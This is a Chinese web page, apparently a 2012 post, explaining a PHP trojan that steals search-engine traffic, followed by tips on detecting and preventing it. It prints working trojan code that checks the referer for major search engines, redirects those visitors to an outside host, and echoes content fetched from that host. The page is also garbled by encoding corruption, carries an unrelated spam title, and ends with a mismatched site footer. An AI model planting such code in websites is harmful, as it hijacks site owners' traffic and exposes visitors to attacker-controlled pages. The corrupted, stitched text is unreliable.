99在线视频免费观看,91色在线
當(dāng)前位置: 主頁 > 其它 > 日志 >

介紹一個截取搜索引擎流量的 php木馬

來源: 瀏覽數(shù):
責(zé)任編輯:robert
時間:2012-03-02 21:34

[導(dǎo)讀]

 

截取搜索引擎流量的php木馬很早就有了,它的作用便是將來自搜索引擎的流量轉(zhuǎn)移到目標(biāo)網(wǎng)站上去。因此,用戶搜索到的雖然是你的網(wǎng)站,打開的卻是別人的網(wǎng)站。


 


下面這段代碼是一個很簡單的示例,技術(shù)進步很快,這樣的木馬今天已經(jīng)不太可能再發(fā)揮作用了。但這種木馬的核心內(nèi)容卻是萬變不離其宗,只是手段更高明些罷了。好,以下便是轉(zhuǎn)移搜索引擎來路流量的php代碼:


 


error_reporting(E_ERROR);


header('content-Type:
text/html; charset=gb2312');


$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";


$referer =
Split("#",$come_from) ;


foreach($referer as $v)


{


if(stristr($_SERVER['HTTP_REFERER'],$v))


{


Header("Location:".'http://www.abc.com/3/nb.html?'.$_SERVER['SERVER_NAME']);


}


      echo
file_get_contents('http://www.abc.com//xx/dn2.php');


}


?>


 


代碼十分簡單:如果訪問來源是baidu,google,sososogou等搜索引擎,那么將會定位到如下所述的html文件和php文件。


 


如何防范類似的攻擊呢?


首先是要經(jīng)??纯淳W(wǎng)站的IIS日志,如果有異??梢约霸绨l(fā)現(xiàn)??吹接心吧奈募蟠蜷_看看,有問題的話就直接刪除。其次常用的系統(tǒng)php文件也要經(jīng)常打開看看,檢查這些文件最近是否被修改過。如果有,那么下載下來,查找里面出現(xiàn)的陌生php文件名,比如出現(xiàn)了一個沒見過的dumy.php,可以搜索下dumy.php,看看是怎么回事。還有,一般別的目錄下還會另有木馬隱藏,在這里可以找到此蹤跡。最后也是最重要的,防患于未然,登錄口令要加強,不管是FTP賬號還是網(wǎng)站后臺地址和登錄名,或是別的什么密碼,如果太弱了,那么建議修改得更復(fù)雜些,這是最簡單也是最有效的安全措施。


 


網(wǎng)站安全應(yīng)該時刻銘記在心,你不在意,那些掛黑鏈的人可惦記你。

免責(zé)聲明:本文僅代表作者個人觀點,與納金網(wǎng)無關(guān)。其原創(chuàng)性以及文中陳述文字和內(nèi)容未經(jīng)本站證實,對本文以及其中全部或者部分內(nèi)容、文字的真實性、完整性、及時性本站不作任何保證或承諾,請讀者僅作參考,并請自行核實相關(guān)內(nèi)容。



  • TAGS:
  • 網(wǎng)友評論

    您需要登錄后才可以發(fā)帖 登錄 | 立即注冊

    關(guān)閉

    全部評論:0條

    聯(lián)系方式

    服務(wù)熱線:15059788121 / 13489872927 / 15959158412

    換鏈Q(jìng)Q:943169942

    電子郵箱:943169942@qq.com

    聯(lián)系地址:福建省晉江國際工業(yè)設(shè)計園5號樓

    福建省信芯長盈科技有限公司 閩ICP備2021016425號-2/3

    Copyright trusteddivorcelawyers.com 2008-2025 All Rights Reserved

    開展“凈網(wǎng)2019"專項行動,堅決保障網(wǎng)絡(luò)空間清朗

    IOS版

    安卓版

    官網(wǎng)認證